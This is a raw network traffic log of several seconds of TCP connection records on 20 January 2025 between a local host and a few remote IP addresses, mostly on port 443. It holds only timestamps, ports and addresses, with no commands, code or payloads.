                                                                              Jan 20, 2025 14:17:30.483431101 CET49840443192.168.2.6104.18.94.41
                                                                              Jan 20, 2025 14:17:30.483433008 CET44349840104.18.94.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.483431101 CET49840443192.168.2.6104.18.94.41
                                                                              Jan 20, 2025 14:17:30.483443022 CET44349840104.18.94.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.483652115 CET49840443192.168.2.6104.18.94.41
                                                                              Jan 20, 2025 14:17:30.484225035 CET44349840104.18.94.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.484406948 CET44349840104.18.94.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.484433889 CET44349840104.18.94.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.484612942 CET49840443192.168.2.6104.18.94.41
                                                                              Jan 20, 2025 14:17:30.484621048 CET44349840104.18.94.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.485702991 CET49840443192.168.2.6104.18.94.41
                                                                              Jan 20, 2025 14:17:30.506529093 CET44349842104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.506875992 CET49842443192.168.2.6104.18.95.41
                                                                              Jan 20, 2025 14:17:30.506903887 CET44349842104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.507231951 CET44349842104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.508200884 CET49842443192.168.2.6104.18.95.41
                                                                              Jan 20, 2025 14:17:30.508285999 CET44349842104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.508426905 CET49842443192.168.2.6104.18.95.41
                                                                              Jan 20, 2025 14:17:30.508426905 CET49842443192.168.2.6104.18.95.41
                                                                              Jan 20, 2025 14:17:30.508461952 CET44349842104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.557568073 CET4434984135.190.80.1192.168.2.6
                                                                              Jan 20, 2025 14:17:30.557777882 CET4434984135.190.80.1192.168.2.6
                                                                              Jan 20, 2025 14:17:30.558077097 CET49841443192.168.2.635.190.80.1
                                                                              Jan 20, 2025 14:17:30.558124065 CET4434984135.190.80.1192.168.2.6
                                                                              Jan 20, 2025 14:17:30.558156013 CET49841443192.168.2.635.190.80.1
                                                                              Jan 20, 2025 14:17:30.558156013 CET49841443192.168.2.635.190.80.1
                                                                              Jan 20, 2025 14:17:30.558271885 CET49841443192.168.2.635.190.80.1
                                                                              Jan 20, 2025 14:17:30.561615944 CET49846443192.168.2.635.190.80.1
                                                                              Jan 20, 2025 14:17:30.561647892 CET4434984635.190.80.1192.168.2.6
                                                                              Jan 20, 2025 14:17:30.566020012 CET49846443192.168.2.635.190.80.1
                                                                              Jan 20, 2025 14:17:30.566020012 CET49846443192.168.2.635.190.80.1
                                                                              Jan 20, 2025 14:17:30.566057920 CET4434984635.190.80.1192.168.2.6
                                                                              Jan 20, 2025 14:17:30.568804979 CET44349840104.18.94.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.568877935 CET44349840104.18.94.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.568908930 CET44349840104.18.94.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.568942070 CET44349840104.18.94.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.569016933 CET49840443192.168.2.6104.18.94.41
                                                                              Jan 20, 2025 14:17:30.569030046 CET44349840104.18.94.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.569062948 CET49840443192.168.2.6104.18.94.41
                                                                              Jan 20, 2025 14:17:30.569238901 CET44349840104.18.94.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.569272041 CET44349840104.18.94.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.569299936 CET44349840104.18.94.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.569389105 CET49840443192.168.2.6104.18.94.41
                                                                              Jan 20, 2025 14:17:30.569389105 CET49840443192.168.2.6104.18.94.41
                                                                              Jan 20, 2025 14:17:30.569397926 CET44349840104.18.94.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.569885969 CET44349840104.18.94.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.569926023 CET44349840104.18.94.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.569972038 CET44349840104.18.94.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.570003986 CET44349840104.18.94.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.570030928 CET49840443192.168.2.6104.18.94.41
                                                                              Jan 20, 2025 14:17:30.570036888 CET44349840104.18.94.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.570065975 CET49840443192.168.2.6104.18.94.41
                                                                              Jan 20, 2025 14:17:30.570065975 CET49840443192.168.2.6104.18.94.41
                                                                              Jan 20, 2025 14:17:30.570458889 CET49840443192.168.2.6104.18.94.41
                                                                              Jan 20, 2025 14:17:30.570945978 CET44349840104.18.94.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.570986032 CET44349840104.18.94.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.571027040 CET49840443192.168.2.6104.18.94.41
                                                                              Jan 20, 2025 14:17:30.571033001 CET44349840104.18.94.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.571083069 CET49840443192.168.2.6104.18.94.41
                                                                              Jan 20, 2025 14:17:30.571083069 CET49840443192.168.2.6104.18.94.41
                                                                              Jan 20, 2025 14:17:30.571810961 CET44349840104.18.94.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.571957111 CET44349840104.18.94.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.572005033 CET44349840104.18.94.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.572012901 CET49840443192.168.2.6104.18.94.41
                                                                              Jan 20, 2025 14:17:30.572019100 CET44349840104.18.94.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.572129011 CET49840443192.168.2.6104.18.94.41
                                                                              Jan 20, 2025 14:17:30.572305918 CET49840443192.168.2.6104.18.94.41
                                                                              Jan 20, 2025 14:17:30.572881937 CET44349840104.18.94.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.573288918 CET49840443192.168.2.6104.18.94.41
                                                                              Jan 20, 2025 14:17:30.655433893 CET44349840104.18.94.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.655494928 CET44349840104.18.94.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.655533075 CET49840443192.168.2.6104.18.94.41
                                                                              Jan 20, 2025 14:17:30.655555964 CET44349840104.18.94.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.655662060 CET44349840104.18.94.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.655682087 CET49840443192.168.2.6104.18.94.41
                                                                              Jan 20, 2025 14:17:30.655703068 CET44349840104.18.94.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.655731916 CET49840443192.168.2.6104.18.94.41
                                                                              Jan 20, 2025 14:17:30.655731916 CET49840443192.168.2.6104.18.94.41
                                                                              Jan 20, 2025 14:17:30.655738115 CET44349840104.18.94.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.655778885 CET49840443192.168.2.6104.18.94.41
                                                                              Jan 20, 2025 14:17:30.656061888 CET49840443192.168.2.6104.18.94.41
                                                                              Jan 20, 2025 14:17:30.656207085 CET44349840104.18.94.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.656249046 CET44349840104.18.94.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.656316996 CET49840443192.168.2.6104.18.94.41
                                                                              Jan 20, 2025 14:17:30.656326056 CET44349840104.18.94.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.656335115 CET49840443192.168.2.6104.18.94.41
                                                                              Jan 20, 2025 14:17:30.656337023 CET44349840104.18.94.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.656404018 CET49840443192.168.2.6104.18.94.41
                                                                              Jan 20, 2025 14:17:30.656404018 CET49840443192.168.2.6104.18.94.41
                                                                              Jan 20, 2025 14:17:30.656723976 CET49840443192.168.2.6104.18.94.41
                                                                              Jan 20, 2025 14:17:30.656734943 CET44349840104.18.94.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.668286085 CET44349842104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.668370962 CET44349842104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.668478012 CET44349842104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.668596029 CET49842443192.168.2.6104.18.95.41
                                                                              Jan 20, 2025 14:17:30.668612003 CET44349842104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.668716908 CET44349842104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.668808937 CET44349842104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.668896914 CET44349842104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.668901920 CET49842443192.168.2.6104.18.95.41
                                                                              Jan 20, 2025 14:17:30.668911934 CET44349842104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.669035912 CET44349842104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.669101954 CET49842443192.168.2.6104.18.95.41
                                                                              Jan 20, 2025 14:17:30.669111967 CET44349842104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.671997070 CET49842443192.168.2.6104.18.95.41
                                                                              Jan 20, 2025 14:17:30.672005892 CET44349842104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.724200010 CET49842443192.168.2.6104.18.95.41
                                                                              Jan 20, 2025 14:17:30.724220037 CET44349842104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.755567074 CET44349842104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.755645037 CET44349842104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.755717993 CET44349842104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.755744934 CET49842443192.168.2.6104.18.95.41
                                                                              Jan 20, 2025 14:17:30.755755901 CET44349842104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.755814075 CET49842443192.168.2.6104.18.95.41
                                                                              Jan 20, 2025 14:17:30.756187916 CET44349842104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.756258011 CET44349842104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.756407976 CET49842443192.168.2.6104.18.95.41
                                                                              Jan 20, 2025 14:17:30.756417990 CET44349842104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.756761074 CET44349842104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.756829977 CET49842443192.168.2.6104.18.95.41
                                                                              Jan 20, 2025 14:17:30.756839037 CET44349842104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.756910086 CET44349842104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.757395029 CET49842443192.168.2.6104.18.95.41
                                                                              Jan 20, 2025 14:17:30.757405043 CET44349842104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.757581949 CET44349842104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.757673979 CET44349842104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.757720947 CET49842443192.168.2.6104.18.95.41
                                                                              Jan 20, 2025 14:17:30.757728100 CET44349842104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.757831097 CET44349842104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.757855892 CET49842443192.168.2.6104.18.95.41
                                                                              Jan 20, 2025 14:17:30.757886887 CET44349842104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.758130074 CET49842443192.168.2.6104.18.95.41
                                                                              Jan 20, 2025 14:17:30.758140087 CET44349842104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.758390903 CET49842443192.168.2.6104.18.95.41
                                                                              Jan 20, 2025 14:17:30.758398056 CET44349842104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.758495092 CET44349842104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.758573055 CET44349842104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.758645058 CET44349842104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.758683920 CET49842443192.168.2.6104.18.95.41
                                                                              Jan 20, 2025 14:17:30.758713961 CET44349842104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.758836985 CET49842443192.168.2.6104.18.95.41
                                                                              Jan 20, 2025 14:17:30.760411978 CET44349842104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.760535955 CET49842443192.168.2.6104.18.95.41
                                                                              Jan 20, 2025 14:17:30.760545015 CET44349842104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.801107883 CET49842443192.168.2.6104.18.95.41
                                                                              Jan 20, 2025 14:17:30.843332052 CET44349842104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.843494892 CET44349842104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.843555927 CET44349842104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.843636990 CET44349842104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.843655109 CET49842443192.168.2.6104.18.95.41
                                                                              Jan 20, 2025 14:17:30.843679905 CET44349842104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.843724012 CET49842443192.168.2.6104.18.95.41
                                                                              Jan 20, 2025 14:17:30.843857050 CET44349842104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.843946934 CET44349842104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.843997002 CET49842443192.168.2.6104.18.95.41
                                                                              Jan 20, 2025 14:17:30.844007015 CET44349842104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.844059944 CET49842443192.168.2.6104.18.95.41
                                                                              Jan 20, 2025 14:17:30.844130039 CET44349842104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.844229937 CET44349842104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.844266891 CET49842443192.168.2.6104.18.95.41
                                                                              Jan 20, 2025 14:17:30.844275951 CET44349842104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.844314098 CET49842443192.168.2.6104.18.95.41
                                                                              Jan 20, 2025 14:17:30.844333887 CET44349842104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.844450951 CET44349842104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.844506025 CET49842443192.168.2.6104.18.95.41
                                                                              Jan 20, 2025 14:17:30.844515085 CET44349842104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.844547033 CET49842443192.168.2.6104.18.95.41
                                                                              Jan 20, 2025 14:17:30.844613075 CET44349842104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.844700098 CET44349842104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.844753027 CET49842443192.168.2.6104.18.95.41
                                                                              Jan 20, 2025 14:17:30.844762087 CET44349842104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.844805956 CET49842443192.168.2.6104.18.95.41
                                                                              Jan 20, 2025 14:17:30.845377922 CET44349842104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.845506907 CET44349842104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.845604897 CET49842443192.168.2.6104.18.95.41
                                                                              Jan 20, 2025 14:17:30.845619917 CET44349842104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.845657110 CET49842443192.168.2.6104.18.95.41
                                                                              Jan 20, 2025 14:17:30.845670938 CET44349842104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.845777988 CET44349842104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.845812082 CET49842443192.168.2.6104.18.95.41
                                                                              Jan 20, 2025 14:17:30.845830917 CET44349842104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.845899105 CET49842443192.168.2.6104.18.95.41
                                                                              Jan 20, 2025 14:17:30.846278906 CET44349842104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.846405029 CET49842443192.168.2.6104.18.95.41
                                                                              Jan 20, 2025 14:17:30.846424103 CET44349842104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.846703053 CET49842443192.168.2.6104.18.95.41
                                                                              Jan 20, 2025 14:17:30.944248915 CET44349842104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.944366932 CET44349842104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.944479942 CET49842443192.168.2.6104.18.95.41
                                                                              Jan 20, 2025 14:17:30.944480896 CET44349842104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.944509029 CET44349842104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.944546938 CET49842443192.168.2.6104.18.95.41
                                                                              Jan 20, 2025 14:17:30.944566011 CET49842443192.168.2.6104.18.95.41
                                                                              Jan 20, 2025 14:17:30.944598913 CET44349842104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.944690943 CET44349842104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.944797039 CET44349842104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.944938898 CET49842443192.168.2.6104.18.95.41
                                                                              Jan 20, 2025 14:17:30.944952011 CET44349842104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.945030928 CET49842443192.168.2.6104.18.95.41
                                                                              Jan 20, 2025 14:17:30.945040941 CET44349842104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.945063114 CET44349842104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.945080996 CET49842443192.168.2.6104.18.95.41
                                                                              Jan 20, 2025 14:17:30.945089102 CET44349842104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.945101023 CET49842443192.168.2.6104.18.95.41
                                                                              Jan 20, 2025 14:17:30.945120096 CET49842443192.168.2.6104.18.95.41
                                                                              Jan 20, 2025 14:17:30.945162058 CET44349842104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.945214987 CET49842443192.168.2.6104.18.95.41
                                                                              Jan 20, 2025 14:17:30.945224047 CET44349842104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.945275068 CET49842443192.168.2.6104.18.95.41
                                                                              Jan 20, 2025 14:17:30.945307016 CET44349842104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.945461988 CET44349842104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.945580959 CET44349842104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.945645094 CET49842443192.168.2.6104.18.95.41
                                                                              Jan 20, 2025 14:17:30.945655107 CET44349842104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.946213007 CET44349842104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:30.946352959 CET49842443192.168.2.6104.18.95.41
                                                                              Jan 20, 2025 14:17:30.946655035 CET49842443192.168.2.6104.18.95.41
                                                                              Jan 20, 2025 14:17:30.946676970 CET44349842104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:31.040205956 CET4434984635.190.80.1192.168.2.6
                                                                              Jan 20, 2025 14:17:31.042602062 CET49846443192.168.2.635.190.80.1
                                                                              Jan 20, 2025 14:17:31.042617083 CET4434984635.190.80.1192.168.2.6
                                                                              Jan 20, 2025 14:17:31.043416023 CET4434984635.190.80.1192.168.2.6
                                                                              Jan 20, 2025 14:17:31.069768906 CET49846443192.168.2.635.190.80.1
                                                                              Jan 20, 2025 14:17:31.069768906 CET49846443192.168.2.635.190.80.1
                                                                              Jan 20, 2025 14:17:31.069789886 CET4434984635.190.80.1192.168.2.6
                                                                              Jan 20, 2025 14:17:31.069899082 CET4434984635.190.80.1192.168.2.6
                                                                              Jan 20, 2025 14:17:31.116892099 CET49846443192.168.2.635.190.80.1
                                                                              Jan 20, 2025 14:17:31.196754932 CET4434984635.190.80.1192.168.2.6
                                                                              Jan 20, 2025 14:17:31.196839094 CET4434984635.190.80.1192.168.2.6
                                                                              Jan 20, 2025 14:17:31.196896076 CET49846443192.168.2.635.190.80.1
                                                                              Jan 20, 2025 14:17:31.428246975 CET49846443192.168.2.635.190.80.1
                                                                              Jan 20, 2025 14:17:31.428271055 CET4434984635.190.80.1192.168.2.6
                                                                              Jan 20, 2025 14:17:31.579963923 CET49850443192.168.2.6104.18.95.41
                                                                              Jan 20, 2025 14:17:31.580008030 CET44349850104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:31.580065966 CET49850443192.168.2.6104.18.95.41
                                                                              Jan 20, 2025 14:17:31.580284119 CET49850443192.168.2.6104.18.95.41
                                                                              Jan 20, 2025 14:17:31.580295086 CET44349850104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:31.661835909 CET49856443192.168.2.6104.18.94.41
                                                                              Jan 20, 2025 14:17:31.661850929 CET44349856104.18.94.41192.168.2.6
                                                                              Jan 20, 2025 14:17:31.661919117 CET49856443192.168.2.6104.18.94.41
                                                                              Jan 20, 2025 14:17:31.662158012 CET49856443192.168.2.6104.18.94.41
                                                                              Jan 20, 2025 14:17:31.662166119 CET44349856104.18.94.41192.168.2.6
                                                                              Jan 20, 2025 14:17:32.052541971 CET44349850104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:32.052866936 CET49850443192.168.2.6104.18.95.41
                                                                              Jan 20, 2025 14:17:32.052906990 CET44349850104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:32.053231001 CET44349850104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:32.053682089 CET49850443192.168.2.6104.18.95.41
                                                                              Jan 20, 2025 14:17:32.053757906 CET44349850104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:32.053852081 CET49850443192.168.2.6104.18.95.41
                                                                              Jan 20, 2025 14:17:32.095331907 CET44349850104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:32.133590937 CET44349856104.18.94.41192.168.2.6
                                                                              Jan 20, 2025 14:17:32.133898973 CET49856443192.168.2.6104.18.94.41
                                                                              Jan 20, 2025 14:17:32.133929014 CET44349856104.18.94.41192.168.2.6
                                                                              Jan 20, 2025 14:17:32.134279013 CET44349856104.18.94.41192.168.2.6
                                                                              Jan 20, 2025 14:17:32.134608030 CET49856443192.168.2.6104.18.94.41
                                                                              Jan 20, 2025 14:17:32.134675980 CET44349856104.18.94.41192.168.2.6
                                                                              Jan 20, 2025 14:17:32.134984970 CET49856443192.168.2.6104.18.94.41
                                                                              Jan 20, 2025 14:17:32.179332018 CET44349856104.18.94.41192.168.2.6
                                                                              Jan 20, 2025 14:17:32.195646048 CET44349850104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:32.195751905 CET44349850104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:32.195812941 CET49850443192.168.2.6104.18.95.41
                                                                              Jan 20, 2025 14:17:32.195822954 CET44349850104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:32.195882082 CET49850443192.168.2.6104.18.95.41
                                                                              Jan 20, 2025 14:17:32.196444035 CET49850443192.168.2.6104.18.95.41
                                                                              Jan 20, 2025 14:17:32.196487904 CET44349850104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:32.209124088 CET49857443192.168.2.6104.18.95.41
                                                                              Jan 20, 2025 14:17:32.209162951 CET44349857104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:32.209534883 CET49857443192.168.2.6104.18.95.41
                                                                              Jan 20, 2025 14:17:32.209764004 CET49857443192.168.2.6104.18.95.41
                                                                              Jan 20, 2025 14:17:32.209777117 CET44349857104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:32.246177912 CET4434976066.63.187.232192.168.2.6
                                                                              Jan 20, 2025 14:17:32.246243954 CET4434976066.63.187.232192.168.2.6
                                                                              Jan 20, 2025 14:17:32.246411085 CET49760443192.168.2.666.63.187.232
                                                                              Jan 20, 2025 14:17:32.278522968 CET44349856104.18.94.41192.168.2.6
                                                                              Jan 20, 2025 14:17:32.278597116 CET44349856104.18.94.41192.168.2.6
                                                                              Jan 20, 2025 14:17:32.278645992 CET49856443192.168.2.6104.18.94.41
                                                                              Jan 20, 2025 14:17:32.279500008 CET49856443192.168.2.6104.18.94.41
                                                                              Jan 20, 2025 14:17:32.279525042 CET44349856104.18.94.41192.168.2.6
                                                                              Jan 20, 2025 14:17:32.674119949 CET44349857104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:32.674423933 CET49857443192.168.2.6104.18.95.41
                                                                              Jan 20, 2025 14:17:32.674444914 CET44349857104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:32.674731016 CET44349857104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:32.675165892 CET49857443192.168.2.6104.18.95.41
                                                                              Jan 20, 2025 14:17:32.675220013 CET44349857104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:32.675327063 CET49857443192.168.2.6104.18.95.41
                                                                              Jan 20, 2025 14:17:32.719367981 CET44349857104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:32.719558001 CET49857443192.168.2.6104.18.95.41
                                                                              Jan 20, 2025 14:17:32.807209015 CET44349857104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:32.807274103 CET44349857104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:32.807353973 CET49857443192.168.2.6104.18.95.41
                                                                              Jan 20, 2025 14:17:32.808331013 CET49857443192.168.2.6104.18.95.41
                                                                              Jan 20, 2025 14:17:32.808346987 CET44349857104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:32.818919897 CET49760443192.168.2.666.63.187.232
                                                                              Jan 20, 2025 14:17:32.818978071 CET4434976066.63.187.232192.168.2.6
                                                                              Jan 20, 2025 14:17:32.819441080 CET49863443192.168.2.6104.18.94.41
                                                                              Jan 20, 2025 14:17:32.819473028 CET44349863104.18.94.41192.168.2.6
                                                                              Jan 20, 2025 14:17:32.819545984 CET49863443192.168.2.6104.18.94.41
                                                                              Jan 20, 2025 14:17:32.819844007 CET49863443192.168.2.6104.18.94.41
                                                                              Jan 20, 2025 14:17:32.819856882 CET44349863104.18.94.41192.168.2.6
                                                                              Jan 20, 2025 14:17:33.285948038 CET44349863104.18.94.41192.168.2.6
                                                                              Jan 20, 2025 14:17:33.286840916 CET49863443192.168.2.6104.18.94.41
                                                                              Jan 20, 2025 14:17:33.286850929 CET44349863104.18.94.41192.168.2.6
                                                                              Jan 20, 2025 14:17:33.287352085 CET44349863104.18.94.41192.168.2.6
                                                                              Jan 20, 2025 14:17:33.287869930 CET49863443192.168.2.6104.18.94.41
                                                                              Jan 20, 2025 14:17:33.288021088 CET49863443192.168.2.6104.18.94.41
                                                                              Jan 20, 2025 14:17:33.288067102 CET44349863104.18.94.41192.168.2.6
                                                                              Jan 20, 2025 14:17:33.331583977 CET49863443192.168.2.6104.18.94.41
                                                                              Jan 20, 2025 14:17:33.427066088 CET44349863104.18.94.41192.168.2.6
                                                                              Jan 20, 2025 14:17:33.427145004 CET44349863104.18.94.41192.168.2.6
                                                                              Jan 20, 2025 14:17:33.427205086 CET49863443192.168.2.6104.18.94.41
                                                                              Jan 20, 2025 14:17:33.464596987 CET49863443192.168.2.6104.18.94.41
                                                                              Jan 20, 2025 14:17:33.464654922 CET44349863104.18.94.41192.168.2.6
                                                                              Jan 20, 2025 14:17:33.592268944 CET804977466.63.187.232192.168.2.6
                                                                              Jan 20, 2025 14:17:33.592535019 CET804977466.63.187.232192.168.2.6
                                                                              Jan 20, 2025 14:17:33.592597008 CET4977480192.168.2.666.63.187.232
                                                                              Jan 20, 2025 14:17:33.771332979 CET49869443192.168.2.6104.18.95.41
                                                                              Jan 20, 2025 14:17:33.771392107 CET44349869104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:33.771476984 CET49869443192.168.2.6104.18.95.41
                                                                              Jan 20, 2025 14:17:33.772669077 CET49869443192.168.2.6104.18.95.41
                                                                              Jan 20, 2025 14:17:33.772691965 CET44349869104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:34.240046978 CET44349869104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:34.240622044 CET49869443192.168.2.6104.18.95.41
                                                                              Jan 20, 2025 14:17:34.240639925 CET44349869104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:34.241288900 CET44349869104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:34.241740942 CET49869443192.168.2.6104.18.95.41
                                                                              Jan 20, 2025 14:17:34.241854906 CET49869443192.168.2.6104.18.95.41
                                                                              Jan 20, 2025 14:17:34.241862059 CET44349869104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:34.241878986 CET49869443192.168.2.6104.18.95.41
                                                                              Jan 20, 2025 14:17:34.241930962 CET44349869104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:34.241988897 CET44349869104.18.95.41192.168.2.6
                                                                              Jan 20, 2025 14:17:34.241997004 CET49869443192.168.2.6104.18.95.41
                                                                              Jan 20, 2025 14:17:34.241997004 CET49869443192.168.2.6104.18.95.41
                                                                              Jan 20, 2025 14:17:34.242079020 CET44349869104.18.95.41192.168.2.6
